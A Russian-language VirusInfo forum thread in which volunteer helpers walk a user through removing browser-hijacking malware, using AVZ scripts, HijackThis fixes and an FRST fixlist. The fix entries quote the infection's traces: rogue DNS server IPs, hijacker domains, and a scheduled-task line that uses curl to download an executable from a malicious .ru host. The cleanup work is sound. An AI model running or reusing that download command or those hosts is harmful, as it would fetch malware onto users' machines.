Показано с 1 по 14 из 14.

Открываются вкладки с сайтами на которые не пускает антивирус Dr.Web (заявка № 212273)

  1. #1
    Junior Member Репутация
    Регистрация
    01.04.2008
    Сообщений
    56
    Вес репутации
    59

    Thumbs up Открываются вкладки с сайтами на которые не пускает антивирус Dr.Web

    здравствуйте.
    через каждые 5-7 минут в браузерах открываются вкладки с сайтами на которые не пускает антивирус Dr.Web.
    выполнил лечение утилитой CureIt - не помогло.
    помогите пожалуйста.
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) wolya, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3103
    Выполните скрипт в AVZ
    Код:
    begin
    ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
    ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
    if not IsWOW64
     then
      begin
       SearchRootkit(true, true);
       SetAVZGuardStatus(True);
      end;
    ExecuteFile('schtasks.exe', '/delete /TN "2infoblogcomynors" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "all-journalnethilxozs" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "browser-netnetrnors" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "good-journalorgcroazs" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "green5newsnetsasds" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "green5newsorgaasds" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "hit5newsnetdasds" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "hitnews1orgxcoms" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "httppanameraporscheecomkordons" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "journal-goodorgbtechs" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "linenewsorgleeboos" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "myblognewsorggasds" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "new1newsnetvzxcs" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "news-truenetzozas" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "newstop5netqnors" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "newstop5orgwnors" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "notbadnewsorgmorfs" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "youfreenewsnetncoms" /F', 0, 15000, true);
    ExecuteFile('schtasks.exe', '/delete /TN "top5newsorgenors" /F', 0, 15000, true);
     QuarantineFile('C:\Users\User\AppData\Local\Kometa\Application\kometa.exe','');
     QuarantineFile('C:\Windows\TEMP\clearcache.dll','');
     DeleteFile('C:\Windows\TEMP\clearcache.dll','32');
     DeleteFile('C:\Users\User\AppData\Local\Amigo\Application\amigo.exe','32');
     RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\amigo','command');
     RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ldwcoyprdg','command');
     DeleteFile('C:\Users\User\AppData\Local\Kometa\Application\kometa.exe','32');
    
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
    RebootWindows(false);
    end.
    Будет выполнена перезагрузка компьютера.

    Выполните скрипт в AVZ
    Код:
    begin
    CreateQurantineArchive('c:\quarantine.zip');
    end.
    c:\quarantine.zip пришлите по красной ссылке Прислать запрошенный карантин над первым сообщением темы.

    Пожалуйста, выполните ЕЩЕ РАЗ правила, прикрепите к сообщению НОВЫЕ логи Autologger
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  5. Это понравилось:


  6. #4
    Junior Member Репутация
    Регистрация
    01.04.2008
    Сообщений
    56
    Вес репутации
    59
    крассная ссылка не ссылка (не нажимается - это просто текст). прислать вложением?
    перестали открываться окна браузера с вирусным содержимым. спасибо большое.
    заметил, что пропала языковая панель и не включается через настройки. в Regedit не заходит и не показывает ошибок при его запуске. ОС на компьютере Windows 7x64.
    Последний раз редактировалось wolya; 22.05.2017 в 12:13.

  7. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,459
    Вес репутации
    1058
    Перечитайте последние 2 строки сообщения хелпера и сделайте, что он просит.
    WBR,
    Vadim

  8. #6
    Junior Member Репутация
    Регистрация
    01.04.2008
    Сообщений
    56
    Вес репутации
    59
    Цитата Сообщение от thyrex Посмотреть сообщение
    Пожалуйста, выполните ЕЩЕ РАЗ правила, прикрепите к сообщению НОВЫЕ логи Autologger
    выполнил правила, прикрепляю новые логи Autologer
    Вложения Вложения

  9. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,459
    Вес репутации
    1058
    Запустите HijackThis, расположенный в папке Autologger и пофиксите:
    Код:
    O17 - HKLM\System\CCS\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 35.177.46.238
    O17 - HKLM\System\CCS\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 46.101.28.31
    O17 - HKLM\System\CCS\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 82.202.226.203
    O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 35.177.46.238
    O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 46.101.28.31
    O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{12DB2EE8-3CAE-4AB9-B201-E281464C8216}: NameServer = 82.202.226.203
    O22 - Task: (Ready) curl.job - C:\Documents and Settings\Admin\Application Data\curl\curl_7_54.exe -f -s -L http://eltugno.ru/f.exe -o "C:\Documents and Settings\Admin\Application Data\curl\curl.exe"
    O22 - Task: (Ready) curls.job - C:\Documents and Settings\Admin\Application Data\curl\curl.exe
    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  10. #8
    Junior Member Репутация
    Регистрация
    01.04.2008
    Сообщений
    56
    Вес репутации
    59
    отчёты FRST
    Вложения Вложения

  11. #9
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3103
    1. Откройте Блокнот и скопируйте в него приведенный ниже текст
    Код:
    CreateRestorePoint:
    HKU\S-1-5-21-1417001333-854245398-1801674531-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://ertowap.ru/?utm_source=startpage03&utm_content=117e0d6c7b95dc5e3c4d6ef9a0fa4da4&utm_term=EF09D419C3961A01B8BAF0B735D68642&utm_d=20171129
    CHR HKU\S-1-5-21-1417001333-854245398-1801674531-1003\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ddadgcdmddljmpkpinkalnepdepplpkj] - hxxp://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-1417001333-854245398-1801674531-1003\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [gkcfopbmpihfnphgamgibhkdhdgnplfp] - hxxp://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-1417001333-854245398-1801674531-1003\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ledkfmfckejkemlmpckiaoaldhldfmbe] - hxxp://clients2.google.com/service/update2/crx
    2018-01-10 15:31 - 2018-01-10 15:31 - 000000000 ____D C:\Documents and Settings\Admin\Local Settings\Application Data\Unnyhog
    2017-11-29 17:15 - 2017-11-29 17:15 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\0hbPf949CCH5.exe
    2017-11-29 17:17 - 2017-11-29 17:17 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\59PO9Birl4bJ.exe
    2017-11-29 17:13 - 2017-11-29 17:17 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\D3Eri0Y7DUEU.exe
    2017-11-29 17:17 - 2017-11-29 17:17 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\dcsyoUS0BfIA.exe
    2017-11-29 17:26 - 2017-11-29 17:26 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\fvUEGf4ytjzL.exe
    2017-05-05 08:37 - 2017-05-05 08:37 - 000012288 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\LUIBcjHGgrklrTwSJPPt.DLL
    2017-11-29 17:08 - 2017-11-29 17:08 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\n48Qi09M5VtN.exe
    2017-11-29 17:15 - 2017-11-29 17:15 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\rffGbXNoqpRw.exe
    2017-11-29 17:20 - 2017-11-29 17:20 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\sNiQzCjLIF4B.exe
    2017-11-29 17:26 - 2017-11-29 17:26 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\xUiw6losXNx7.exe
    2017-11-29 17:08 - 2017-11-29 17:08 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\Y3qb4F8oUHmt.exe
    2017-11-29 17:20 - 2017-11-29 17:20 - 000000000 _____ () C:\Documents and Settings\Admin\Local Settings\Temp\Y6JGXqoGPGU5.exe
    Reboot:
    2. Нажмите ФайлСохранить как
    3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool
    4. Укажите Тип файлаВсе файлы (*.*)
    5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить
    6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
    [list][*]Обратите внимание: будет выполнена перезагрузка компьютера.
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  12. #10
    Junior Member Репутация
    Регистрация
    01.04.2008
    Сообщений
    56
    Вес репутации
    59
    выполнил. высылаю Fixlog.txt
    Вложения Вложения

  13. #11
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3103
    Проблема решена?
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  14. #12
    Junior Member Репутация
    Регистрация
    01.04.2008
    Сообщений
    56
    Вес репутации
    59
    Подмены exe файлов при скачивании из интернета уже нет.
    при открытии хрома открывался вот этот сайт
    hxxp://pzemisa.ru/?utm_source=startp...utm_d=20171129

    в настройках хрома было установлено при запуске открывать заданные страницы - список был пуст.
    я переключил настройку на - открывать ранее открытые страницы.
    больше эта pzemisa.ru не открывается.

    пока наблюдаю. ничего подозрительного пока не вижу.

    Спасибо вам большое!
    Последний раз редактировалось Vvvyg; 13.01.2018 в 20:16.

  15. #13
    Junior Member Репутация
    Регистрация
    01.04.2008
    Сообщений
    56
    Вес репутации
    59
    10 дней прошло с момента лечения. ничего подозрительного не замечено. все вредоносные ссылки выявленные входе лечения добавил в список блокирования, что бы кто-то из домашних опять не подцепил эту заразу. думаю проблему вы решили. спасибо вам огромное!

  16. #14
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,233
    Вес репутации
    977

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 4
    • В ходе лечения вредоносные программы в карантинах не обнаружены


  • Уважаемый(ая) wolya, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Ответов: 6
      Последнее сообщение: 02.09.2016, 21:54
    2. Ответов: 7
      Последнее сообщение: 11.02.2016, 14:10
    3. Ответов: 17
      Последнее сообщение: 22.10.2015, 23:47
    4. Ответов: 6
      Последнее сообщение: 15.01.2015, 23:31
    5. Ответов: 3
      Последнее сообщение: 29.12.2012, 21:09

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00434 seconds with 20 queries